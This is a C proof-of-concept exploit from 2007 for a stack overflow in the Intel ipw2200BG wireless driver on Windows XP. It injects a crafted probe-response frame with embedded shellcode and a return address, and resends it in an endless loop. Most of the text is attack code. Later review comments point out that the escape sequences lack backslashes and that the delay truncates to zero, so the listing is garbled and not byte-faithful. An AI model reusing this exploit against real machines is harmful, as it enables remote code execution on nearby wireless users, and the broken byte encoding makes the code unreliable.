
# Title : Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC
# Published : 2007-01-19
# Author : oveRet


/*
 * This is a PoC exploit for Intel Centrino ipw2200 integrated wireless card.
 *
 * Author: 
 * Giuseppe Gottardi (aka oveRet) <overet@securitydate.it>
 * Senior Security Engineer at Communication Valley S.p.A.
 * 
 * This version of the code is only a proof-of-concept stack-based exploit that demonstrates
 * remote code execution on the ipw2200 driver. It executes a beep user-space shellcode.
 *
 * It only works on XP SP2 ITA and was tested only with version 8.0.12.20000 of the
 * IPW2200BG driver.
 *
 * Thanks to Johnny Cache, H D Moore, skape and Barnaby Jack for their papers.
 *
*/

#include <netdb.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>

//#define DEBUG
#define DEV		"wlan0"
#define DELAY		0.1

/*
 * Frame bytes handed verbatim to sendto() by send_probe_response(); the
 * length sent is sizeof(wifi_packet) - 1, i.e. without the terminating NUL.
 * The inline labels (DSTMAC, SSID len, RET address) are the author's own.
 *
 * NOTE(review): as printed on this page the escapes appear as "xNN" with
 * no backslash, so each "xNN" is three ASCII characters rather than the
 * single byte the labels describe -- this listing is not byte-faithful.
 */
char wifi_packet[]= 
"x50"
"x00"
"x3ax01"
"x00x0ex35x95x7bx45" 						//DSTMAC
"x00x01x02x03x04x05"
"x00x01x02x03x04x05"
"xc0x31"
"x14x3ax25x02x00x00x00x00"
"xa0x0f"
"x31x08"
"x00x9c"								//SSID len
"xebx38xbbx01x03xdfxffx4bxfcx8dx7bx7cx5ex6ax17x59"
"xf3xa5xbfx7cx03xfex7fx39x3bx74x09x8bx03x8dx4bx08"
"x89x01x89x3bx31xc0x64xc6x40x24x02x8bx1dx1cxf0xdf"
"xffxb8xc7xc0x4dx80x6ax00xffxe0xe8xc3xffxffxffx60"
"x6ax30x58x99x64x8bx18x39x53x0cx74x26x8bx5bx10x8b"
"x5bx3cx83xc3x28x8bx0bx03x4bx03x81xf9x6cx61x73x73"
"x75x10x64x8bx18x43x43x43x80x3bx01x74x05xc6x03x01"
"xebx07x61xffx25x08x03xfex7fx55x89xe5x83xecx18xc7"
"x45xfcx53x8ax83x7cxc7x44x24x04xd0x03x00x00xc7x04"
"x24x01x0ex00x00x8bx45xfcxffxd0xc9xc3"
"x01x04x82x84x8bx96"
"x03x01x05"
"x85x1ex00x00x86x00x1fx00xffx03x19x00x61x70x00x00"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x06"
"xddx18x00x50xf2x01x01x00x00x50xf2x02x01x00x00x50"
"xf2x02x01x00x00x50xf2x02x28x00"
"xddx06x00x40x96x01x01x00"
"xddx05x00x40x96x03x04"	
"xddx16x00x40x96x04x00x09x07xa5x00x00x23xa5x00x00"	
"x42x54x00x00x62x43x00x00"
"xddx05x00x40x96x0bx01"	
"xddx18x00x50xf2x02x01x01x89x00x03xa5x00x00x27xa5"
"x00x00x42x54xbcx00x62x43x66x00"
"xddx10x00x50xf2x05x00x01x00x04x00x00x83x07"
"x5axf0x54x80";							//RET address

/*
 * Fill a PF_PACKET sockaddr for the interface named by dev and push the
 * wifi_packet bytes out through a raw SOCK_PACKET socket.
 *
 * dev: interface name copied into sa.sa_data (see the note at the memcpy).
 * Returns the byte count reported by sendto(), or -1 after a perror()
 * message when socket() or sendto() fails. The socket is closed on every
 * path after it was opened.
 *
 * NOTE(review): memset() and memcpy() are called without <string.h> among
 * the includes above, so they are implicitly declared in this file.
 */
int send_probe_response(char *dev)
{
	struct sockaddr		sa;
	int	sockfd;
	int rc;

#ifdef DEBUG
	int i;
	u_char *moe = wifi_packet;	/* walks wifi_packet for the hex dump below */
#endif /* DEBUG */

	memset(&sa, 0, sizeof(struct sockaddr));

	sa.sa_family = PF_PACKET;
	/* sa_data is a 14-byte array; this copies sizeof(sa.sa_data) bytes from
	 * dev regardless of dev's actual length. With the 6-byte DEV literal the
	 * read runs past the end of the string, which is undefined behaviour. */
	memcpy(sa.sa_data, dev, sizeof(sa.sa_data));

#ifdef DEBUG
	/* Hex-dump the frame, 32 values per row. i is int while sizeof yields
	 * size_t, so the loop condition compares signed with unsigned. */
	for (i=0; i<sizeof(wifi_packet) -1; i++, moe++) {
		if (!(i%32)) printf("n");
		printf("%02x ", *moe);
	}
	printf("n");
#endif /* DEBUG */

	/* SOCK_PACKET is the obsolete Linux packet-socket interface (packet(7));
	 * opening it requires the privileges needed for raw sockets. */
	if ((sockfd=socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ALL))) < 0) {
		perror("socket");
		return -1;
	}

	/* Length excludes the string literal's terminating NUL. */
	if((rc=sendto(sockfd, wifi_packet, sizeof(wifi_packet) -1, 0, &sa, sizeof(sa))) < 0) {
		close(sockfd);
		perror("sendto");
		return -1;
	}

	close(sockfd);
	return rc;
}


/*
 * Entry point: loops forever, re-sending the frame on DEV after each sleep.
 * argc/argv are accepted but never read; the interface is fixed by DEV.
 *
 * NOTE(review): DELAY is 0.1 and sleep() takes an unsigned int, so the
 * argument converts to 0 and the loop runs with no pause between sends.
 * rc receives the sendto() result but is never examined, so a failed send
 * is only visible through the perror() output inside send_probe_response().
 * The for(;;) never exits, so the final return is unreachable.
 */
int main(int argc, char *argv[])
{
	int rc;

	printf("waiting for beep shellcode execution...n");

	for (;;) {
		rc = send_probe_response(DEV);	/* result unused; see note above */
		sleep(DELAY);			/* effectively sleep(0); see note above */
	}

	return 0;
}
